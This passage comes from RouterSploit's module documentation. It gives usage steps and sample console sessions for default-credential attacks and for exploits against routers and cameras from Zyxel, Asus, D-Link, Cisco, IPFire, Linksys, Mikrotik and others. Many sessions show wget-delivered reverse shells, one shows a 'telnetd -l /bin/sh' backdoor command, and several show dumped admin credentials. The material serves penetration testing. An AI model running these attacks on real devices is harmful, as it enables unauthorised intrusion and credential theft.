If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zyxel/ssh_default_creds rsf (Zyxel Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Zyxel Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/routers/zyxel/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Zyxel Router Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/routers/zyxel/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/routers/zyxel/telnet_default_creds rsf (Zyxel Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Zyxel Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... 
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/encoders/perl/base64.md ================================================ ## Description Module encodes Perl payload to base64 format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/perl/base64` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/perl/base64 rsf (Perl Base64 Encoder) > show info Name: Perl Base64 Encoder Description: Module encodes PERL payload to Base64 format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/perl/hex.md ================================================ ## Description Module encodes Perl payload to hex format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/perl/hex` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/perl/hex rsf (Perl Hex Encoder) > show info Name: Perl Hex Encoder Description: Module encodes PERL payload to Hex format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/php/base64.md ================================================ ## Description Module encodes PHP payload to base64 format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/php/base64` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/php/base64 rsf (PHP Base64 Encoder) > show info Name: PHP Base64 Encoder Description: Module encodes PHP payload to Base64 format. 
Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/php/hex.md ================================================ ## Description Module encodes PHP payload to Hex format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/php/hex` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/php/hex rsf (PHP Hex Encoder) > show info Name: PHP Hex Encoder Description: Module encodes PHP payload to Hex format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/python/base64.md ================================================ ## Description Module encodes Python payload to base64 format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/python/base64` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/python/base64 rsf (Python Base64 Encoder) > show info Name: Python Base64 Encoder Description: Module encodes Python payload to Base64 format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/encoders/python/hex.md ================================================ ## Description Module encodes Python payload to hex format. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use encoders/python/hex` 3. Do: `show info` ## Scenarios ``` rsf > use encoders/python/hex rsf (Python Hex Encoder) > show info Name: Python Hex Encoder Description: Module encodes Python payload to Hex format. Authors: - Marcin Bury ``` ================================================ FILE: docs/modules/exploits/cameras/acti/acm_5611_rce.md ================================================ ## Description Module exploits ACTi ACM-5611 Video Camera Remote Command Execution Exploit. ## Verification Steps 1. Start ./rsf.py 2. use exploits/cameras/acti/acm_5611_rce 3. set target 192.168.1.1 4. run 5. If device is vulnerable user credentials are returned. 
## Scenarios ``` rsf > use exploits/cameras/acti/acm_5611_rce rsf (JACTi ACM-5611 Video Camera RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (JACTi ACM-5611 Video Camera RCE) > run [*] Running module... [+] Target seems to be vulnerable ``` ================================================ FILE: docs/modules/exploits/cameras/geuterbruck/efd_2250.md ================================================ ## Description This module exploits an arbitrary command execution vulnerability. The vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an anonymous user to execute arbitrary commands with root privileges. ## Verification Steps 1. Start ./rsf.py 2. use exploits/cameras/geuterbruck/efd_2250 3. set target 192.168.1.1 5. run 6. If device is vulnerable, you will receive a reverse shell. ## Scenarios ``` rsf > use exploits/cameras/geuterbruck/efd_2250 rsf (Geutebruck G-Cam/EFD-2250 RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Geutebruck G-Cam/EFD-2250 RCE) > run [*] Running module exploits/cameras/geuterbruck/efd_2250... [+] Target seams 192.168.1.1:80 is vulnerable ``` ================================================ FILE: docs/modules/exploits/cameras/jovision/jovision_credentials_disclosure.md ================================================ ## Description Module exploits a CGI script on some Jovision cameras that doesn't validate whether the client is logged in, causing it to return credentials. ## Verification Steps 1. Start ./rsf.py 2. use exploits/cameras/jovision/jovision_credentials_disclosure 3. set target 192.168.1.1 4. run 5. If device is vulnerable, user credentials are returned. ## Scenarios ``` rsf > use exploits/cameras/jovision/jovision_credentials_disclosure rsf (Jovision camera credential disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Jovision camera credential disclosure) > run [*] Running module...
[+] Target seems to be vulnerable [+] Accounts found: Description Username Password Administrator ----------- -------- -------- ------------- Admin account admin ADMIN Yes Guest account guest 1234 No ``` ================================================ FILE: docs/modules/exploits/cameras/multi/cctv_dvr_rce.md ================================================ ## Description Remote Code Execution in CCTV-DVR affecting over 70 different vendors. ## Verification Steps 1. Start ./rsf.py 2. use exploits/cameras/multi/cctv_dvr_rce 3. set target 192.168.1.1 4. set connback 192.168.1.100:5555 5. run 6. If device is vulnerable, you will receive a reverse shell. ## Scenarios ``` rsf > use exploits/cameras/multi/cctv_dvr_rce rsf (Multiple CCTV-DVR Vendors) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Multiple CCTV-DVR Vendors) > set connback 192.168.1.100:5555 [+] connback => 192.168.1.100:5555 rsf (Multiple CCTV-DVR Vendors) > run [*] Running module... [+] Target is vulnerable [*] Exploit payload sent! [+] If nothing went wrong we should be getting a reversed remote shell at 192.168.1.100:5555 ``` ================================================ FILE: docs/modules/exploits/misc/watchguard/xcs_9_rce.md ================================================ ## Description This module exploits two separate vulnerabilities found in the Watchguard XCS virtual appliance to gain command execution. By exploiting an unauthenticated SQL injection, a remote attacker may insert a valid web user into the appliance database, and get access to the web interface. On the other hand, a vulnerability in the web interface allows the attacker to inject operating system commands as the "nobody" user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/misc/watchguard/xcs_9_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8.
Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/misc/watchguard/xcs_9_rce rsf (Watchguard XCS Remote Command Execution) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Watchguard XCS Remote Command Execution) > run [*] Running module exploits/misc/watchguard/xcs_9_rce... [*] Getting a valid session... [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp x64 Bind TCP Creates interactive tcp bind shell for x64 architecture. reverse_tcp x64 Reverse TCP Creates interactive tcp reverse shell for x64 architecture. cmd > set payload reverse_tcp cmd (x64 Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd (x64 Reverse TCP) > set lhost 192.168.1.115 lhost => 192.168.1.115 cmd (x64 Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:56981 [+] Enjoy your shell ``` ================================================ FILE: docs/modules/exploits/routers/asus/asuswrt_lan_rce.md ================================================ ## Description Module exploits multiple vulnerabilities to achieve remote code execution in AsusWRT firmware. The HTTP server contains vulnerability that allows bypass authentication via POST requests. Combining this with another vulnerability in the VPN configuration upload functionality allows setting NVRAM configuration variables directly from the POST request. 
By setting the NVRAM variable ateCommand_flag to 1, it is possible to enable a special command mode which allows executing commands via the infosvr server listening on UDP port 9999. Module was tested on Asus RT-AC68U 3.0.0.4.380_7378. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/asus/asuswrt_lan_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/asus/asuswrt_lan_rce rsf (AsusWRT Lan RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (AsusWRT Lan RCE) > run [*] Running module... [+] Successfuly set ateCommand_flag variable [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp ARMLE Bind TCP Creates interactive tcp bind shell for ARMLE architecture. reverse_tcp ARMLE Reverse TCP Creates interactive tcp reverse shell for ARMLE architecture. cmd > set payload reverse_tcp cmd (ARMLE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd (ARMLE Reverse TCP) > set lhost 192.168.1.115 lhost => 192.168.1.115 cmd (ARMLE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:56981 [+] Enjoy your shell ls -la drwxr-xr-x 18 admin root 325 Mar 15 2017 . drwxr-xr-x 18 admin root 325 Mar 15 2017 ..
drwxr-xr-x 2 admin root 3 Mar 15 2017 asus_jffs drwxr-xr-x 2 admin root 706 Mar 15 2017 bin drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs1 drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs2 drwxr-xr-x 5 admin root 1540 Aug 1 2015 dev lrwxrwxrwx 1 admin root 7 Mar 15 2017 etc -> tmp/etc lrwxrwxrwx 1 admin root 8 Mar 15 2017 home -> tmp/home drwxr-xr-x 5 admin root 0 Sep 4 22:40 jffs drwxr-xr-x 3 admin root 402 Mar 15 2017 lib lrwxrwxrwx 1 admin root 9 Mar 15 2017 media -> tmp/media drwxr-xr-x 2 admin root 3 Mar 15 2017 mmc lrwxrwxrwx 1 admin root 7 Mar 15 2017 mnt -> tmp/mnt lrwxrwxrwx 1 admin root 7 Mar 15 2017 opt -> tmp/opt dr-xr-xr-x 106 admin root 0 Jan 1 1970 proc drwxr-xr-x 7 admin root 766 Mar 15 2017 rom lrwxrwxrwx 1 admin root 13 Mar 15 2017 root -> tmp/home/root drwxr-xr-x 2 admin root 2428 Mar 15 2017 sbin drwxr-xr-x 11 admin root 0 Jan 1 1970 sys drwxr-xr-x 2 admin root 3 Mar 15 2017 sysroot drwxrwxrwx 13 admin root 860 Sep 4 22:50 tmp drwxr-xr-x 8 admin root 139 Mar 15 2017 usr lrwxrwxrwx 1 admin root 7 Mar 15 2017 var -> tmp/var drwxr-xr-x 14 admin root 6036 Mar 15 2017 www ``` ================================================ FILE: docs/modules/exploits/routers/asus/infosvr_backdoor_rce.md ================================================ ## Description Module exploits remote command execution in multiple ASUS devices. If the target is vulnerable, a command loop is invoked that allows executing commands on operating system level. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/asus/infosvr_backdoor_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell.
## Scenarios ``` rsf > use exploits/routers/asus/infosvr_backdoor_rce rsf (Asus Infosvr Backdoor RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Asus Infosvr Backdoor RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [*] Please note that only first 256 characters of the output will be displayed or use reverse_tcp [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp ARMLE Bind TCP Creates interactive tcp bind shell for ARMLE architecture. reverse_tcp ARMLE Reverse TCP Creates interactive tcp reverse shell for ARMLE architecture. cmd > set payload reverse_tcp cmd (ARMLE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd (ARMLE Reverse TCP) > set lhost 192.168.1.115 lhost => 192.168.1.115 cmd (ARMLE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:35220 [+] Enjoy your shell ls -la ls -la drwxr-xr-x 18 admin root 325 Mar 15 2017 . drwxr-xr-x 18 admin root 325 Mar 15 2017 .. 
drwxr-xr-x 2 admin root 3 Mar 15 2017 asus_jffs drwxr-xr-x 2 admin root 706 Mar 15 2017 bin drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs1 drwxr-xr-x 2 admin root 3 Mar 15 2017 cifs2 drwxr-xr-x 5 admin root 1540 Sep 4 23:04 dev lrwxrwxrwx 1 admin root 7 Mar 15 2017 etc -> tmp/etc lrwxrwxrwx 1 admin root 8 Mar 15 2017 home -> tmp/home drwxr-xr-x 5 admin root 0 Sep 4 23:25 jffs drwxr-xr-x 3 admin root 402 Mar 15 2017 lib lrwxrwxrwx 1 admin root 9 Mar 15 2017 media -> tmp/media drwxr-xr-x 2 admin root 3 Mar 15 2017 mmc lrwxrwxrwx 1 admin root 7 Mar 15 2017 mnt -> tmp/mnt lrwxrwxrwx 1 admin root 7 Mar 15 2017 opt -> tmp/opt dr-xr-xr-x 101 admin root 0 Jan 1 1970 proc drwxr-xr-x 7 admin root 766 Mar 15 2017 rom lrwxrwxrwx 1 admin root 13 Mar 15 2017 root -> tmp/home/root drwxr-xr-x 2 admin root 2428 Mar 15 2017 sbin drwxr-xr-x 11 admin root 0 Jan 1 1970 sys drwxr-xr-x 2 admin root 3 Mar 15 2017 sysroot drwxrwxrwx 13 admin root 860 Sep 4 23:33 tmp drwxr-xr-x 8 admin root 139 Mar 15 2017 usr lrwxrwxrwx 1 admin root 7 Mar 15 2017 var -> tmp/var drwxr-xr-x 14 admin root 6036 Mar 15 2017 www ``` ================================================ FILE: docs/modules/exploits/routers/cisco/rv320_command_injection.md ================================================ ## Description Module exploits Cisco RV320 Remote Command Injection vulnerability in the web-based certificate generator feature. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/cisco/rv320_command_injection` 3. Do: `set target [TargetIP]` 4. Do: `set command [Remote Command]` 5. Do: `run` 6. If router is vulnerable, it should be possible to execute command on operating system level. 
## Scenarios ``` rsf > use exploits/routers/cisco/rv320_command_injection rsf (Cisco RV320 Command Injection) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco RV320 Command Injection) > set command "telnetd -l /bin/sh -p 1337" [+] command => "telnetd -l /bin/sh -p 1337" rsf (Cisco RV320 Command Injection) > run [*] Running module exploits/routers/cisco/rv320_command_injection... [+] Target is vulnerable [*] Gonna go grab us a config file... [+] We seem to have found a valid config! [*] Extracting Creds... [+] Got user: cisco [+] Got password (hash): [redacted] [*] Sending request to extract auth key... [+] Got auth_key value: 1964300002 [+] Login Successful, we can proceed! [*] Ok, now to run your command: telnetd -l /bin/sh -p 1337 [*] We don't get output so... Yeah. Shits blind. ``` ================================================ FILE: docs/modules/exploits/routers/dlink/dir_655_866_652_rce.md ================================================ ## Description Module exploits an unauthenticated remote code execution vulnerability in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/dlink/dir_655_866_652_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/dlink/dir_655_866_652_rce rsf (D-Link PingTest RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link PingTest RCE) > run [*] Running module exploits/routers/dlink/dir_655_866_652_rce... [+] Target is vulnerable [*] Invoking command loop... [*] It is blind command injection, response is not available [+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture. reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture. cmd > set payload reverse_tcp cmd (MIPSLE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port cmd (MIPSLE Reverse TCP) > set lhost 192.168.1.4 lhost => 192.168.1.4 cmd (MIPSLE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:41933 [+] Enjoy your shell ls -la drwxrwxrwx 15 admin root 224 Mar 11 2013 . drwxrwxrwx 15 admin root 224 Mar 11 2013 .. drwxr-xr-x 2 admin root 2554 Mar 11 2013 bin drwxr-xr-x 2 admin root 3 Mar 11 2013 data drwxr-xr-x 4 admin root 2482 Mar 11 2013 dev drwxr-xr-x 12 admin root 779 Mar 11 2013 etc drwxr-xr-x 6 admin root 690 Mar 11 2013 lib lrwxrwxrwx 1 admin root 11 Mar 11 2013 linuxrc -> bin/busybox drwxr-xr-x 2 admin root 0 Jan 1 1970 mnt drwxr-xr-x 5 admin root 56 Mar 11 2013 opt dr-xr-xr-x 69 admin root 0 Jan 1 1970 proc drwxr-xr-x 2 admin root 270 Mar 11 2013 sbin drwxr-xr-x 11 admin root 0 Jan 1 1970 sys lrwxrwxrwx 1 admin root 8 Mar 11 2013 tmp -> /var/tmp drwxr-xr-x 4 admin root 38 Mar 11 2013 usr drwxr-xr-x 16 admin root 0 Oct 19 20:36 var drwxr-xr-x 5 admin root 2801 Mar 11 2013 webs ``` ================================================ FILE: docs/modules/exploits/routers/dlink/dsl_2750b_rce.md ================================================ ## Description This module exploits remote code execution vulnerability in D-Link DSL-2750B devices through "cli" parameter. Vulnerable firmwares are 1.01 up to 1.03. ## Verification Steps 1. 
Start `./rsf.py` 2. Do: `use exploits/routers/dlink/dsl_2750b_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/dlink/dsl_2750b_rce rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link DSL-2750B RCE) > run [*] Running module... [+] Target appears to be vulnerable [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture. reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture. cmd > set payload reverse_tcp cmd (MIPSBE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4 lhost => 192.168.1.4 cmd (MIPSBE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:41933 [+] Enjoy your shell ls -la drwxrwxrwx 15 admin root 224 Mar 11 2013 . drwxrwxrwx 15 admin root 224 Mar 11 2013 .. 
drwxr-xr-x 2 admin root 2554 Mar 11 2013 bin drwxr-xr-x 2 admin root 3 Mar 11 2013 data drwxr-xr-x 4 admin root 2482 Mar 11 2013 dev drwxr-xr-x 12 admin root 779 Mar 11 2013 etc drwxr-xr-x 6 admin root 690 Mar 11 2013 lib lrwxrwxrwx 1 admin root 11 Mar 11 2013 linuxrc -> bin/busybox drwxr-xr-x 2 admin root 0 Jan 1 1970 mnt drwxr-xr-x 5 admin root 56 Mar 11 2013 opt dr-xr-xr-x 69 admin root 0 Jan 1 1970 proc drwxr-xr-x 2 admin root 270 Mar 11 2013 sbin drwxr-xr-x 11 admin root 0 Jan 1 1970 sys lrwxrwxrwx 1 admin root 8 Mar 11 2013 tmp -> /var/tmp drwxr-xr-x 4 admin root 38 Mar 11 2013 usr drwxr-xr-x 16 admin root 0 Oct 19 20:36 var drwxr-xr-x 5 admin root 2801 Mar 11 2013 webs ``` ================================================ FILE: docs/modules/exploits/routers/ipfire/ipfire_proxy_rce.md ================================================ ## Description This module exploits IPFire < 2.19 Core Update 101 Remote Code Execution vulnerability which allows executing commands on operating system level. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/ipfire/ipfire_proxy_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload awk_reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/ipfire/ipfire_proxy_rce rsf (IPFire Proxy RCE) > set target 192.168.2.88 [+] target => 192.168.2.88 rsf (IPFire Proxy RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > uname -a [*] Executing 'uname -a' on the device... 
Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk. awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk. awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk. cmd > set payload awk_reverse_tcp cmd (Awk Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd awk Awk binary cmd (Awk Reverse TCP) > set lhost 192.168.2.100 lhost => 192.168.2.100 cmd (Awk Reverse TCP) > run [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.2.88:44168 [+] Enjoy your shell uname -a Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux whoami nobody id uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody) ``` ================================================ FILE: docs/modules/exploits/routers/ipfire/ipfire_shellshock.md ================================================ ## Description Exploits shellshock vulnerability in IPFire <= 2.15 Core Update 82. If the target is vulnerable it is possible to execute commands on operating system level. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/ipfire/ipfire_shellshock` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload awk_reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. 
## Scenarios ``` rsf > use exploits/routers/ipfire/ipfire_proxy_rce rsf (IPFire Proxy RCE) > set target 192.168.2.88 [+] target => 192.168.2.88 rsf (IPFire Proxy RCE) > show options Target options: Name Current settings Description ---- ---------------- ----------- ssl true SSL enabled: true/false target 192.168.2.88 Target IPv4 or IPv6 address port 444 Target HTTP port Module options: Name Current settings Description ---- ---------------- ----------- verbosity true Verbosity enabled: true/false username admin Username to log in with password admin Password to log in with rsf (IPFire Proxy RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > uname -a [*] Executing 'uname -a' on the device... Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk. awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk. awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk. cmd > set payload awk_reverse_tcp cmd (Awk Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port encoder Encoder cmd awk Awk binary cmd (Awk Reverse TCP) > set lhost 192.168.2.100 lhost => 192.168.2.100 cmd (Awk Reverse TCP) > run [*] Executing payload on the device [*] Waiting for reverse shell... 
[*] Connection from 192.168.2.88:48775 [+] Enjoy your shell id uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody) ``` ================================================ FILE: docs/modules/exploits/routers/linksys/eseries_themoon_rce.md ================================================ ## Description This module exploits a remote code execution vulnerability in multiple Linksys E-Series devices. The vulnerability was actively used by TheMoon worm. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/linksys/eseries_themoon_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If router is vulnerable, it should be possible to execute commands on operating system level. 6. Do: `set payload reverse_tcp` 7. Do: `set lhost [AttackerIP]` 8. Do: `run` 9. Payload is sent to device and executed providing attacker with the command shell. ## Scenarios ``` rsf > use exploits/routers/linksys/eseries_themoon_rce rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys E-Series TheMoon RCE) > run [*] Running module... [+] Target appears to be vulnerable [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture. reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture. cmd > set payload reverse_tcp cmd (MIPSBE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4 lhost => 192.168.1.4 cmd (MIPSBE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... 
[*] Connection from 192.168.1.1:41933 [+] Enjoy your shell ``` ================================================ FILE: docs/modules/exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure.md ================================================ ## Description Module bypasses authentication through the WinBox service in Mikrotik devices running versions from 6.29 (release date: 2015/28/05) to 6.42 (release date: 2018/04/20) and retrieves administrative credentials. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If the device is vulnerable, administrative credentials are returned. ## Scenarios ``` rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run [*] Running module... [*] Connection established [+] Target seems to be vulnerable [*] Dumping credentials Username Password -------- -------- user1 test admin admin admin admin ``` ================================================ FILE: docs/modules/exploits/routers/multi/tcp_32764_info_disclosure.md ================================================ ## Description Module exploits backdoor functionality that allows fetching credentials for the administrator user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/multi/tcp_32764_info_disclosure` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If the device is vulnerable, administrative credentials are returned. ## Scenarios ``` rsf > use exploits/routers/multi/tcp_32764_info_disclosure rsf (TCP-32764 Info Disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TCP-32764 Info Disclosure) > run [*] Running module... 
